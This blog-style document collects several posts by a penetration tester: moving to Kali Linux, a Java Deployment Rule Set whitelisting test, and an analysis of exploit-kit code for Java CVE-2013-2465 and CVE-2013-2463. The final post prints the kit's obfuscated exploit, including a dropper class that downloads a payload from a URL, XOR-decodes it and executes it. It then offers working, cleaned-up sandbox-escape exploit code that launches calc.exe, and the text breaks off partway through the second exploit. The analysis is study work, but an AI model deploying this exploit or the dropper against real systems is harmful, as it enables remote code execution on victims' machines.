Using Kali Linux as my sole OS

It’s been a while since I posted anything, I’ve been pretty busy… but I’ve recently been looking into pentesting distros other than Kali, so I thought I’d make a quick post.

It was only a couple of years ago that I was primarily a Windows user. At the time, I was into gaming, so Windows was really the only option I had. At home, my desktop had to run Windows, not only because most games only run on Windows, but also because that’s what the family is used to. If I had to travel, my laptop running Windows 7 had to be handy so I could play StarCraft 2 or World of Warcraft in the hotel – I spent a lot of time gaming.

Switching to Backtrack

In an effort to break my gaming addiction, in mid-2012 I decided to make the move to Linux. Not only that, but I decided that I would only use Backtrack. Yes, I know it’s not the “safest” distro for general use, but my main goal at the time was to put all that time I would have spent gaming towards the more practical use of learning how pentests are done – from the tools to the techniques. It was also around this time that I decided to sign up for Offensive Security’s Pentesting with Backtrack course (amazing class by the way). So, with my 64-bit Backtrack laptop (64-bit not recommended for general use or PWB, but I like challenges), I managed to have lots of fun in the lab, and learned a lot about Linux, pentesting, Python, and C. It was totally worth the switch.

However, Backtrack is a pain. It took me hours to install, configure, and get everything I required on top of the default install configured so that everything actually worked together. I actually wrote a procedure for a clean install, as I ended up doing this so many times (primarily due to paranoia). It included everything from setting up a non-root account (easy) to installing OCLHashcat (for the underpowered nVidia GPU in my laptop, to tinker with – this was a challenge to figure out). Once complete, it made for a decent general use laptop, considering my general use is not typical.

On to Kali Linux

Now (and for a while now), Kali Linux is here. Everything installed just works together without the need for troubleshooting. Since it’s Debian based, it’s simple to customize and add in other software, and chances are you won’t break anything by doing so. The only con is that you still have to set up a non-root account, but that’s not hard to do, so there’s little reason to let that get in the way of giving it a try.

So far, every additional installation I’ve done has worked flawlessly – the list of installs includes:

  • VMWare Workstation
  • Virtual Box
  • Chromium (with Flash)
  • Tor (why not)
  • LibreOffice
  • XChat IRC
  • OCLHashCat (not used on my laptop, but installed anyway)
  • Java SDK (disabled for browsing of course)
  • 0 A.D. (linux game, not amazing, but helps with the addiction)
  • and more

All of these were simple to install, especially compared to doing the same in BackTrack.

Kali is stable, familiar, and is not missing any tools I typically use (and if it is missing something, it’s easy enough to install). I really don’t have any complaints about Kali. It even has a disk encryption option during install (Backtrack didn’t), which I of course chose, and I’ve seen no performance hit by doing so.

Looking Into Other Pentesting Distros

I really just started looking around, not because I’m unhappy with Kali, but mainly because I’m curious. I’ve downloaded BackBox Linux and Pentoo to start with… from what I’m hearing, these seem to be the next most popular distros. I don’t have much to say yet, as I’ve really just started, but if I notice anything that makes me drop Kali and make a switch, I’ll be sure to say something.

Until then, I just wanted to point out that Kali Linux is great at being a general use OS. Just make sure you set up a non-root user for added security, and it should be safe enough for general use.

Java Deployment Rule Set

While the Java Deployment Rule Set has been out for a short while now, I just got around to looking into it.

I initially had some doubts that I could get it to work the way I intended, but after a few short hours, I had effectively disabled all Java applications except the ones I explicitly had in my XML whitelist.

Backing up a little bit, everyone out there is aware that many enterprises have issues with upgrading to the latest Java version. There have been many proposed solutions, some of which work better than others, but in my opinion, there really hasn’t been anything that mitigates the risk significantly enough for the additional cost of any given solution. For example, using two browsers, one for internal use and one for web browsing, was a proposal I’ve heard thrown around. While this may work in theory, by doing this an enterprise would incur more costs to keep the second browser patched and maintained, and more costs to build security controls around this new browser as well (policies to disable the ability for users to use a proxy, or to use the intranet browser to go on the internet, etc.), not to mention that any additional installed software introduces additional risk just by being there.

In any case, after initially reading various articles, such as this one, this whitelisting concept sounded interesting, so I thought I would give it a try.

Preparation

First, to set up my VM, I installed the following applications:

  1. JDK 7u40 (required)
  2. JRE 6u30 (any old version of java should work)
  3. OpenSSL for Windows (you’ll need a certificate to sign the JAR file)

After that, I mostly followed Oracle’s initial blog about Deployment Rule Sets, so some of the following is repeated, but I tried to give more detail, as some parts were unclear in their blog if you just quickly wanted to throw together a POC.

Generate and Install Certificate

First, as you’ll need to sign the final JAR file, with OpenSSL installed, I ran the following commands to generate a PKCS12 file, answering the various questions as necessary:

cd C:\OpenSSL-Win64\bin
set OPENSSL_CONF=C:\OpenSSL-Win64\bin\openssl.cfg
openssl.exe req -x509 -nodes -days 365 -newkey rsa:2048 -keyout privateKey.key -out certificate.crt
openssl.exe pkcs12 -export -inkey privateKey.key -in certificate.crt -name jaxin -out server.p12

After everything was generated, I copied the various generated files to my desktop just to make things easy.

Next, I imported this certificate into Java by opening the Java Control Panel, going to the Security tab, and clicking on Manage Certificates.
[Screenshot: Java Deployment Rule Set Import Cert1]

From there, select the Signer CA drop-down, and import the certificate you just generated.
[Screenshot: Java Deployment Rule Set Import Cert2]

Create and Install the RuleSet

Just for a simple test, I used the following ruleset and saved it to a file called ruleset.xml on my Desktop:

<ruleset version="1.0+">
  <rule>
    <id location="javatester.org" />
    <action permission="run" version="1.6.0_30" />
  </rule>
  <rule>
    <id />
    <action permission="block">
      <message>Blocked by corporate</message>
    </action>
  </rule>
</ruleset>

In the real world, you would have a rule for every white-listed internal application at your enterprise, but I just wanted to test this new functionality out. The first rule should allow Java applets in the javatester.org domain to run fine, under Java 6u30. The second rule is a catch-all, and should block all other Java applets you browse to.

Now, in the command window, I ran the following:

jar -cvf DeploymentRuleSet.jar ruleset.xml
keytool -import -file certificate.crt -alias jaxin -keystore jaxin.jks
jarsigner -verbose -keystore server.p12 -storepass NA -storetype pkcs12 DeploymentRuleSet.jar jaxin

I then created the directory C:\Windows\Sun\Java\Deployment and copied the signed DeploymentRuleSet.jar file there.
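As an added example (my own code, not from the post or from Oracle), here is a Python audit of a DeploymentRuleSet.jar that covers the ruleset semantics above and the SECURE-1.7 default discussed in the conclusion: it parses ruleset.xml out of the JAR, flags a missing catch-all, a catch-all placed before the specific rules it would shadow (rules are evaluated top to bottom, first match wins), or a catch-all that runs everything without pinning a SECURE version, and reports whether any META-INF signature entries exist. The JAR is built in memory from two constructed rulesets (one modelled on the post’s, one deliberately misordered); the signature check is a presence check only, not a verification, which is what jarsigner -verify is for.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Constructed sample modelled on the ruleset in the post (not the post's own file).
SAMPLE_RULESET = """<ruleset version="1.0+">
  <rule>
    <id location="javatester.org" />
    <action permission="run" version="1.6.0_30" />
  </rule>
  <rule>
    <id />
    <action permission="block">
      <message>Blocked by corporate</message>
    </action>
  </rule>
</ruleset>"""

# Constructed counter-example: the catch-all comes first (so it shadows the
# javatester.org rule) and it runs everything on whatever JRE is present.
BAD_RULESET = """<ruleset version="1.0+">
  <rule>
    <id />
    <action permission="run" />
  </rule>
  <rule>
    <id location="javatester.org" />
    <action permission="run" version="1.6.0_30" />
  </rule>
</ruleset>"""


def parse_rules(ruleset_xml):
    """Flatten <rule> elements into dicts; location and title both None is the <id /> catch-all."""
    root = ET.fromstring(ruleset_xml)
    rules = []
    for rule in root.findall("rule"):
        rid = rule.find("id")
        action = rule.find("action")
        rules.append({
            "location": rid.get("location") if rid is not None else None,
            "title": rid.get("title") if rid is not None else None,
            "permission": action.get("permission") if action is not None else None,
            "version": action.get("version") if action is not None else None,
        })
    return rules


def audit_rules(rules):
    """Return findings about the catch-all rule. The JRE applies the first matching rule."""
    findings = []
    catch_all = [i for i, r in enumerate(rules) if r["location"] is None and r["title"] is None]
    if not catch_all:
        findings.append("no catch-all <id /> rule: unlisted sites get the JRE's default behaviour")
        return findings
    first = catch_all[0]
    shadowed = rules[first + 1:]
    if shadowed:
        findings.append("catch-all at index %d shadows %d later rule(s) (first match wins)"
                        % (first, len(shadowed)))
    ca = rules[first]
    if ca["permission"] == "run" and not (ca["version"] or "").startswith("SECURE"):
        findings.append("catch-all runs unknown applets without pinning a SECURE version")
    return findings


def build_jar(ruleset_xml):
    """Build an unsigned in-memory JAR, as `jar -cvf DeploymentRuleSet.jar ruleset.xml` does."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\r\n\r\n")
        zf.writestr("ruleset.xml", ruleset_xml)
    return buf.getvalue()


def inspect_jar(jar_bytes):
    """Locate ruleset.xml in the JAR, audit it, and list signature entries (presence only)."""
    report = {"has_ruleset": False, "signature_files": [], "findings": []}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        names = zf.namelist()
        report["signature_files"] = [
            n for n in names
            if n.startswith("META-INF/") and n.upper().endswith((".SF", ".RSA", ".DSA", ".EC"))
        ]
        if "ruleset.xml" in names:
            report["has_ruleset"] = True
            report["findings"] = audit_rules(parse_rules(zf.read("ruleset.xml").decode("utf-8")))
        else:
            report["findings"].append("ruleset.xml missing at JAR root")
    if not report["signature_files"]:
        # An unsigned rule set is not applied by the JRE; jarsigner -verify does the real check.
        report["findings"].append("no signature entries in META-INF: the JRE will not apply an unsigned rule set")
    return report


if __name__ == "__main__":
    for label, xml in (("post-style ruleset", SAMPLE_RULESET), ("misordered ruleset", BAD_RULESET)):
        print(label, inspect_jar(build_jar(xml)))
```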

Testing the RuleSet

Finally, the results :)

I navigated to http://javatester.org/version.html, and I was presented with the following (Note: I enabled the Java Console to always display, just to see what happens):
[Screenshot: Java Deployment Rule Set Result1]

First, the Java 7 update 40 console appeared (left console appeared first), and it appears to have checked the ‘whitelist’ and run the applet under Java 6 update 30 (right console appeared second), just as the ruleset specified. The version the applet detected was in fact Java 6u30, which is what we were going for, as our “legacy” Java software would break under the newer Java versions :)

And, if we go anywhere else, whether it be intranet or internet, we are presented with the following:
[Screenshot: Java Deployment Rule Set Result2]

So everything appears to work as intended.

Conclusion

While this was just a quick POC, it was enough to show this actually has some promise as a solution to mitigate the risk an enterprise incurs by using legacy java applications.

There are some cons to this approach:

  • If not protected, the end user may be able to delete the DeploymentRuleSet.jar and bypass these restrictions. This would mostly affect corporations that allow their users to run as a local administrator, and so have less control over what the user does on their PC.
  • There would be some overhead in managing this DeploymentRuleSet.jar file, storing the certificates, etc.
  • This is a new feature in Java, so there may be some bugs/vulnerabilities introduced (perhaps the white-list can be bypassed? I don’t know, I haven’t looked into how this feature works quite yet).

Still, I am thinking the benefits gained outweigh all the potential cons. Instead of flat out blocking Java for the default rule, you can set the version to SECURE-1.7, which in theory will force users to have the latest/secure version of Java 1.7 installed in order to run all other Java applets they come across. While all versions of Java appear to be vulnerable to something, much of the risk of being infected would be mitigated by running the latest version of Java while browsing the internet.

So in conclusion, this (currently) appears to be a great risk-mitigation solution for enterprises who can’t (or don’t want to) remove or patch Java. I just hope that this white-list isn’t as easy to bypass as the JVM sandbox has been :D

A Java 6 killer – CVE-2013-2465 (update, now with CVE-2013-2463)

Now that my 30 day lab time at OffSec’s CTP course is up (awesome, more on that later), on to CVE-2013-2465, which can exploit all of Java 6, including the latest (6u45), as well as Java 7u21 and below and Java 5u45 and below. As noted elsewhere, this exploit, among many others, is significant as Java 6u45 will not be patched by Oracle, so anyone not upgrading to Java 7 (i.e. the latest out there) will be easily exploited… not that Java 7 is much better, but at least it’s being patched… on occasion…

A nice source to take a look at these exploits can be found here (and it’s a great blog overall): http://malware.dontneedcoffee.com/2013/08/cve-2013-2465-integrating-exploit-kits.html. They also seem to have CVE-2013-2463, which there seems to be a buzz about, so I will probably take a look at that later.

UPDATE: I decided I didn’t need sleep, and took a look at the Neutrino CVE-2013-2463 acquired from dontneedcoffee.com as well as CVE-2013-2465. They are nearly the same, so I figured I might as well include both here :)

Anyway, I wanted to see how this exploit worked and put together some working code, so I downloaded Neutrino’s take on the exploit and analyzed it (‘deobfuscating’ manually of course… I use that term loosely this time).

Starting with CVE-2013-2465:

Alt.java (simplified)

import java.applet.Applet;
import java.awt.geom.AffineTransform;
import java.awt.image.AffineTransformOp;
import java.awt.image.BufferedImage;
import java.awt.image.DataBufferByte;
import java.awt.image.MultiPixelPackedSampleModel;
import java.awt.image.Raster;
import java.awt.image.WritableRaster;
import java.security.AccessControlContext;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;

public class Alt extends Applet
{
  private static final String space = "[0-9]";
  private boolean _is64 = System.getProperty("os.arch", "").contains("64");

  public void init()
  {
    try
    {
      for (int i = 1; (i <= 5) && (ism()); i++)
        attempt();
      if (ism())
        System.exit(0);
      String str = getParameter("exec");
      byte[] arrayOfByte = getParameter("xkey").getBytes("ISO_8859_1");
      drp.dx(str, arrayOfByte);
    }
    catch (Exception localException)
    {
      System.exit(0);
    }
  }

  public static boolean ism()
  {
    return jki.gg() != null;
  }

  private int attempt()
  {
    try
    {
      Class localClass = ijk.scs();
      String str = "setSecurityManager";
      Object[] arrayOfObject1 = new Object[1];
      Object localObject = ikj.stt(localClass, str, arrayOfObject1);
      DataBufferByte localDataBufferByte = new DataBufferByte(16);
      int[] arrayOfInt = new int[8];
      Object[] arrayOfObject2 = new Object[7];
      arrayOfObject2[2] = ikj.stt(localClass, str, arrayOfObject1);
      Permissions localPermissions = new Permissions();
      localPermissions.add(new AllPermission());
      arrayOfObject2[3] = new AccessControlContext(new ProtectionDomain[] { 
            new ProtectionDomain(new CodeSource(null, new Certificate[0]), 
            localPermissions) });
      arrayOfObject2[4] = jik.sgt(arrayOfObject2[2]);
      int i = arrayOfInt.length;
      BufferedImage localBufferedImage1 = new BufferedImage(4, 1, 2);
      MultiPixelPackedSampleModel localMultiPixelPackedSampleModel = 
            new MultiPixelPackedSampleModel(0, 4, 1, 1, 4, 44 + 
            (this._is64 ? 8 : 0));
      WritableRaster localWritableRaster = 
            Raster.createWritableRaster(localMultiPixelPackedSampleModel, 
            localDataBufferByte, null);
      BufferedImage localBufferedImage2 = new BufferedImage(new jki(), 
            localWritableRaster, false, null);
      localBufferedImage1.getRaster().setPixel(0, 0, 
            new int[] { -1, -1, -1, -1 });
      AffineTransformOp localAffineTransformOp = new AffineTransformOp(
            new AffineTransform(1.0F, 0.0F, 0.0F, 1.0F, 0.0F, 0.0F), null);
      localAffineTransformOp.filter(localBufferedImage1, localBufferedImage2);
      int j = arrayOfInt.length;
      if (j == i)
        return 1;
      int k = 0;
      int m = arrayOfObject2.length;
      for (int n = i + 2; n < i + 32; n++)
        if ((arrayOfInt[(n - 1)] == m) && (arrayOfInt[n] == 0) && 
            (arrayOfInt[(n + 1)] == 0) && 
            (arrayOfInt[(n + 2)] != 0) && (arrayOfInt[(n + 3)] != 0) && 
            (arrayOfInt[(n + 4)] != 0) && 
            (arrayOfInt[(n + 5)] == 0) && (arrayOfInt[(n + 6)] == 0))
        {
          int i1 = arrayOfInt[(n + 4)];
          for (int i2 = n + 7; i2 < n + 7 + 64; i2++)
            if (arrayOfInt[i2] == i1)
            {
              arrayOfInt[(i2 - 1)] = arrayOfInt[(n + 3)];
              k = 1;
              break;
            }
          if (k != 0)
            break;
        }
      if (k != 0)
        try
        {
          kji.ste(arrayOfObject2[2]);
        }
        catch (Exception localException2)
        {
        }
    }
    catch (Exception localException1)
    {
    }
    return 0;
  }

  private byte[] pic(String paramString)
  {
    int i = paramString.length();
    byte[] arrayOfByte = new byte[i];
    for (int j = 0; j < i; j++);
    return arrayOfByte;
  }

  private String unpic(byte[] paramArrayOfByte)
  {
    StringBuilder localStringBuilder = new StringBuilder("");
    for (int i = 0; i < paramArrayOfByte.length; i++)
      localStringBuilder.append('A');
    return localStringBuilder.toString();
  }
}
Alt.java (original)

import java.applet.Applet;
import java.awt.geom.AffineTransform;
import java.awt.image.AffineTransformOp;
import java.awt.image.BufferedImage;
import java.awt.image.DataBufferByte;
import java.awt.image.MultiPixelPackedSampleModel;
import java.awt.image.Raster;
import java.awt.image.WritableRaster;
import java.security.AccessControlContext;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;

public class Alt extends Applet
{
  private static final String space = "[0-9]";
  private boolean _is64 = System.getProperty("os.arch", "").contains("23658960895608958238905234850894369806320987698476264".substring(51));

  public void init()
  {
    try
    {
      for (int i = 1; (i <= 5) && (ism()); i++)
        attempt();
      if (ism())
        System.exit(0);
      String str = getParameter("7383568568e464564568465656x568458456845684568e6546845685684568c45845684878467864757584".replaceAll("[0-9]", ""));
      byte[] arrayOfByte = getParameter("357868538x456845685368363865754767638967895738565437568568k65835683568335683456836e5658356856865856356y65548548685454".replaceAll("[0-9]", "")).getBytes("ISO_8859_1");
      drp.dx(str, arrayOfByte);
    }
    catch (Exception localException)
    {
      System.exit(0);
    }
  }

  public static boolean ism()
  {
    return jki.gg() != null;
  }

  private int attempt()
  {
    try
    {
      Class localClass = ijk.scs();
      String str = "5787296778996057409608997181782001s38e45005225928t79487S9124417301e27388412740c6808u26779r304867i957349t193364y67997M1510a86087n53122a574023961g057026331060e06143687r9043645745487".replaceAll("[0-9]", "");
      Object[] arrayOfObject1 = new Object[1];
      Object localObject = ikj.stt(localClass, str, arrayOfObject1);
      DataBufferByte localDataBufferByte = new DataBufferByte(16);
      int[] arrayOfInt = new int[8];
      Object[] arrayOfObject2 = new Object[7];
      arrayOfObject2[2] = ikj.stt(localClass, str, arrayOfObject1);
      Permissions localPermissions = new Permissions();
      localPermissions.add(new AllPermission());
      arrayOfObject2[3] = new AccessControlContext(new ProtectionDomain[] { new ProtectionDomain(new CodeSource(null, new Certificate[0]), localPermissions) });
      arrayOfObject2[4] = jik.sgt(arrayOfObject2[2]);
      int i = arrayOfInt.length;
      BufferedImage localBufferedImage1 = new BufferedImage(4, 1, 2);
      MultiPixelPackedSampleModel localMultiPixelPackedSampleModel = new MultiPixelPackedSampleModel(0, 4, 1, 1, 4, 44 + (this._is64 ? 8 : 0));
      WritableRaster localWritableRaster = Raster.createWritableRaster(localMultiPixelPackedSampleModel, localDataBufferByte, null);
      BufferedImage localBufferedImage2 = new BufferedImage(new jki(), localWritableRaster, false, null);
      localBufferedImage1.getRaster().setPixel(0, 0, new int[] { -1, -1, -1, -1 });
      AffineTransformOp localAffineTransformOp = new AffineTransformOp(new AffineTransform(1.0F, 0.0F, 0.0F, 1.0F, 0.0F, 0.0F), null);
      localAffineTransformOp.filter(localBufferedImage1, localBufferedImage2);
      int j = arrayOfInt.length;
      if (j == i)
        return 1;
      int k = 0;
      int m = arrayOfObject2.length;
      for (int n = i + 2; n < i + 32; n++)
        if ((arrayOfInt[(n - 1)] == m) && (arrayOfInt[n] == 0) && (arrayOfInt[(n + 1)] == 0) && (arrayOfInt[(n + 2)] != 0) && (arrayOfInt[(n + 3)] != 0) && (arrayOfInt[(n + 4)] != 0) && (arrayOfInt[(n + 5)] == 0) && (arrayOfInt[(n + 6)] == 0))
        {
          int i1 = arrayOfInt[(n + 4)];
          for (int i2 = n + 7; i2 < n + 7 + 64; i2++)
            if (arrayOfInt[i2] == i1)
            {
              arrayOfInt[(i2 - 1)] = arrayOfInt[(n + 3)];
              k = 1;
              break;
            }
          if (k != 0)
            break;
        }
      if (k != 0)
        try
        {
          kji.ste(arrayOfObject2[2]);
        }
        catch (Exception localException2)
        {
        }
    }
    catch (Exception localException1)
    {
    }
    return 0;
  }

  private byte[] pic(String paramString)
  {
    int i = paramString.length();
    byte[] arrayOfByte = new byte[i];
    for (int j = 0; j < i; j++);
    return arrayOfByte;
  }

  private String unpic(byte[] paramArrayOfByte)
  {
    StringBuilder localStringBuilder = new StringBuilder("");
    for (int i = 0; i < paramArrayOfByte.length; i++)
      localStringBuilder.append('A');
    return localStringBuilder.toString();
  }
}
drp.java

import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.UnsupportedEncodingException;
import java.net.URL;
import java.nio.ByteBuffer;
import java.nio.channels.Channels;
import java.nio.channels.ReadableByteChannel;
import javax.xml.bind.DatatypeConverter;

class drp
{
  private static String db64(String paramString)
    throws UnsupportedEncodingException
  {
    byte[] arrayOfByte = DatatypeConverter.parseBase64Binary(paramString);
    return new String(arrayOfByte, "UTF-8");
  }

  public static void dx(String paramString, byte[] paramArrayOfByte)
    throws IOException
  {
    if (paramString.isEmpty())
      System.exit(0);
    if (!paramString.startsWith("http"))
      paramString = db64(paramString);
    if (!paramString.startsWith("http"))
      System.exit(0);
    ReadableByteChannel localReadableByteChannel = null;
    try
    {
      localReadableByteChannel = 
        Channels.newChannel(new URL(paramString).openStream());
    }
    catch (IOException localIOException)
    {
      System.exit(0);
    }
    for (ByteBuffer localByteBuffer = ByteBuffer.allocate(4096); 
        localReadableByteChannel.read(localByteBuffer) != -1; 
        localByteBuffer = rsb(localByteBuffer));
    byte[] arrayOfByte = new byte[localByteBuffer.position()];
    localByteBuffer.position(0);
    localByteBuffer.get(arrayOfByte);
    File localFile = File.createTempFile("~tmf", null);
    FileOutputStream localFileOutputStream = new FileOutputStream(localFile);
    int i = paramArrayOfByte.length;
    for (int j = 0; j < arrayOfByte.length; j++)
      arrayOfByte[j] = ((byte)(arrayOfByte[j] ^ paramArrayOfByte[(j % i)]));
    localFileOutputStream.write(arrayOfByte);
    localFileOutputStream.flush();
    localFileOutputStream.close();
    Runtime.getRuntime().exec(new String[] { localFile.getAbsolutePath() });
    System.exit(0);
  }

  private static ByteBuffer rsb(ByteBuffer paramByteBuffer)
  {
    ByteBuffer localByteBuffer = paramByteBuffer;
    if (paramByteBuffer.remaining() < 4096)
    {
      localByteBuffer = ByteBuffer.allocate(paramByteBuffer.capacity() * 2);
      paramByteBuffer.flip();
      localByteBuffer.put(paramByteBuffer);
    }
    return localByteBuffer;
  }
}
ijk.java

import java.awt.color.ICC_ColorSpace;
import java.awt.color.ICC_Profile;

public class ijk extends ICC_ColorSpace
{
  public ijk()
  {
    super(ICC_Profile.getInstance(1000));
  }

  public int getNumComponents()
  {
    int i = 1;
    return i;
  }

  public static Class scs()
  {
    return System.class;
  }
}
ikj.java

import java.beans.Statement;

public class ikj
{
  public static Object stt(Object paramObject, String paramString, 
    Object[] paramArrayOfObject)
    throws Exception
  {
    return new Statement(paramObject, paramString, paramArrayOfObject);
  }
}
jik.java

import java.beans.Statement;

public class jik
{
  public static Object sgt(Object paramObject)
  {
    return ((Statement)paramObject).getTarget();
  }
}
jki.java

import java.awt.image.ComponentColorModel;
import java.awt.image.Raster;

public class jki extends ComponentColorModel
{
  public jki()
  {
    super(new ijk(), new int[] { 8, 8, 8 }, false, false, 1, 0);
  }

  public boolean isCompatibleRaster(Raster paramRaster)
  {
    boolean bool = true;
    return bool;
  }

  public static SecurityManager gg()
  {
    return System.getSecurityManager();
  }
}
kji.java

import java.beans.Statement;

public class kji
{
  public static void ste(Object paramObject)
  {
    try
    {
      ((Statement)paramObject).execute();
    }
    catch (Exception localException)
    {
    }
  }
}

After some review, honestly, the exploit has very little obfuscation. Really, Alt.java is the most notable file, as it contains the actual exploit (the “attempt” function). The only two other files that are necessary are ijk.java (it extends ICC_ColorSpace) and jki.java (it extends ComponentColorModel).

These are the reduced files (which, as always, will pop up calc.exe upon exploit).

Note: Remember to only use this on machines you’re authorized to exploit, anything else is illegal!

Alt.java

import java.applet.Applet;
import java.awt.geom.AffineTransform;
import java.awt.image.AffineTransformOp;
import java.awt.image.BufferedImage;
import java.awt.image.DataBufferByte;
import java.awt.image.MultiPixelPackedSampleModel;
import java.awt.image.Raster;
import java.awt.image.WritableRaster;
import java.security.AccessControlContext;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;
import java.beans.Statement;

public class Alt extends Applet
{
  private boolean _is64 = System.getProperty("os.arch", "").contains("64");

  public void init()
  {
    try
    {
      for (int i = 1; (i <= 5) && (isSecManNotNull()); i++)
      {
        attempt();
      }
      if (isSecManNotNull())
      {
         System.exit(0);
      }
      Runtime.getRuntime().exec(new String[] { "calc.exe" });
    }
    catch (Exception localException)
    {
      System.exit(0);
    }
  }

  public static boolean isSecManNotNull()
  {
    return System.getSecurityManager() != null;
  }

  private int attempt()
  {
    try
    {
      Class localClass = getSystemClass();
      String str = "setSecurityManager";
      Object[] arrayOfObject1 = new Object[1];
      Object localObject = new Statement(localClass, str, arrayOfObject1);
      DataBufferByte localDataBufferByte = new DataBufferByte(16);
      int[] arrayOfInt = new int[8];
      Object[] arrayOfObject2 = new Object[7];
      arrayOfObject2[2] = new Statement(localClass, str, arrayOfObject1);
      Permissions localPermissions = new Permissions();
      localPermissions.add(new AllPermission());
      arrayOfObject2[3] = new AccessControlContext(new ProtectionDomain[] { 
            new ProtectionDomain(new CodeSource(null, new Certificate[0]), 
            localPermissions) });
      arrayOfObject2[4] = ((Statement)arrayOfObject2[2]).getTarget();
      int i = arrayOfInt.length;
      BufferedImage localBufferedImage1 = new BufferedImage(4, 1, 2);
      MultiPixelPackedSampleModel localMultiPixelPackedSampleModel = 
            new MultiPixelPackedSampleModel(0, 4, 1, 1, 4, 44 + 
            (this._is64 ? 8 : 0));
      WritableRaster localWritableRaster = 
            Raster.createWritableRaster(localMultiPixelPackedSampleModel, 
            localDataBufferByte, null);
      BufferedImage localBufferedImage2 = new BufferedImage(
            new myColorModel(), localWritableRaster, false, null);
      localBufferedImage1.getRaster().setPixel(0, 0, 
            new int[] { -1, -1, -1, -1 });
      AffineTransformOp localAffineTransformOp = 
            new AffineTransformOp(new AffineTransform(1.0F, 0.0F, 
            0.0F, 1.0F, 0.0F, 0.0F), null);
      localAffineTransformOp.filter(localBufferedImage1, localBufferedImage2);
      int j = arrayOfInt.length;
      if (j == i)
        return 1;
      int k = 0;
      int m = arrayOfObject2.length;
      for (int n = i + 2; n < i + 32; n++)
        if ((arrayOfInt[(n - 1)] == m) 
            && (arrayOfInt[n] == 0) 
            && (arrayOfInt[(n + 1)] == 0) 
            && (arrayOfInt[(n + 2)] != 0) 
            && (arrayOfInt[(n + 3)] != 0) 
            && (arrayOfInt[(n + 4)] != 0) 
            && (arrayOfInt[(n + 5)] == 0) 
            && (arrayOfInt[(n + 6)] == 0))
        {
          int i1 = arrayOfInt[(n + 4)];
          for (int i2 = n + 7; i2 < n + 7 + 64; i2++)
            if (arrayOfInt[i2] == i1)
            {
              arrayOfInt[(i2 - 1)] = arrayOfInt[(n + 3)];
              k = 1;
              break;
            }
          if (k != 0)
            break;
        }
      if (k != 0)
        try
        {
          ((Statement)arrayOfObject2[2]).execute();
        }
        catch (Exception localException2)
        {
        }
    }
    catch (Exception localException1)
    {
    }
    return 0;
  }

  private byte[] pic(String paramString)
  {
    int i = paramString.length();
    byte[] arrayOfByte = new byte[i];
    for (int j = 0; j < i; j++);
    return arrayOfByte;
  }

  private String unpic(byte[] paramArrayOfByte)
  {
    StringBuilder localStringBuilder = new StringBuilder("");
    for (int i = 0; i < paramArrayOfByte.length; i++)
      localStringBuilder.append('A');
    return localStringBuilder.toString();
  }

  public static Class getSystemClass()
  {
    return System.class;
  }
}
myColorModel.java

import java.awt.image.ComponentColorModel;
import java.awt.image.Raster;

public class myColorModel extends ComponentColorModel
{
  public myColorModel()
  {
    super(new myColorSpace(), new int[] { 8, 8, 8 }, false, false, 1, 0);
  }

  public boolean isCompatibleRaster(Raster paramRaster)
  {
    boolean bool = true;
    return bool;
  }
}
myColorSpace.java

import java.awt.color.ICC_ColorSpace;
import java.awt.color.ICC_Profile;

public class myColorSpace extends ICC_ColorSpace
{
  public myColorSpace()
  {
    super(ICC_Profile.getInstance(1000));
  }

  public int getNumComponents()
  {
    int i = 1;
    return i;
  }
}

And, the result against Java 6u45 (no click-to-run apparently necessary):
[Screenshot: cve-2013-2465-success]

The CVE description says this is related to “Incorrect image channel verification”.

The key seems to be where the AccessControlContext class is essentially passed a Permissions object containing AllPermission(). From what I gather, AffineTransformOp has a call to a vulnerable storeImageArray() method, which seems to have something like a buffer overflow vulnerability, where once outside of that buffer, you are working outside of the sandbox (or something like that, Java isn’t my specialty). Then you use the AllPermission permission to work without a Security Manager.

Update:
Now, taking a look at CVE-2013-2463, the code is just about the same, it just exploits AlphaComposite.Src.createContext instead of AffineTransformOp. But the end code is very similar (the key differing areas are bolded). Also, only a single class is used for this exploit.

Alt2.java

import java.applet.Applet;
import java.awt.AlphaComposite;
import java.awt.CompositeContext;
import java.awt.image.DataBufferByte;
import java.awt.image.IndexColorModel;
import java.awt.image.MultiPixelPackedSampleModel;
import java.awt.image.Raster;
import java.awt.image.WritableRaster;
import java.security.AccessControlContext;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;
import java.beans.Statement;

public class Alt2 extends Applet
{

  private boolean _is64 = System.getProperty("os.arch", "").contains("64");

  public void init()
  {
    try
    {
      for (int i = 1; (i <= 5) && (isSecManNotNull()); i++)
      {
        attempt();
      }
      if (isSecManNotNull())
      {
         System.exit(0);
      }
      Runtime.getRuntime().exec(new String[] { "calc.exe" });
    }
    catch (Exception localException)
    {
      System.exit(0);
    }
  }

  public static boolean isSecManNotNull()
  {
    return System.getSecurityManager() != null;
  }

  private int attempt()
  {
    try
    {
      Class localClass = getSystemClass();
      String str = "setSecurityManager";
      Object[] arrayOfObject1 = new Object[1];
      Object localObject = new Statement(localClass, str, arrayOfObject1);
      DataBufferByte localDataBufferByte1 = new DataBufferByte(9);
      int[] arrayOfInt = new int[8];
      Object[] arrayOfObject2 = new Object[7];
      arrayOfObject2[2] = new Statement(localClass, str, arrayOfObject1);
      Permissions localPermissions = new Permissions();
      localPermissions.add(new AllPermission());
      arrayOfObject2[3] = new AccessControlContext(new ProtectionDomain[] { 
            new ProtectionDomain(new CodeSource(null, new Certificate[0]), 
            localPermissions) });
      arrayOfObject2[4] = ((Statement)arrayOfObject2[2]).getTarget();
      int i = arrayOfInt.length;
      DataBufferByte localDataBufferByte2 = new DataBufferByte(8);
      for (int j = 0; j < 8; j++)
        localDataBufferByte2.setElem(j, -1);
      MultiPixelPackedSampleModel localMultiPixelPackedSampleModel1 = 
            new MultiPixelPackedSampleModel(0, 4, 1, 1, 4, 0);
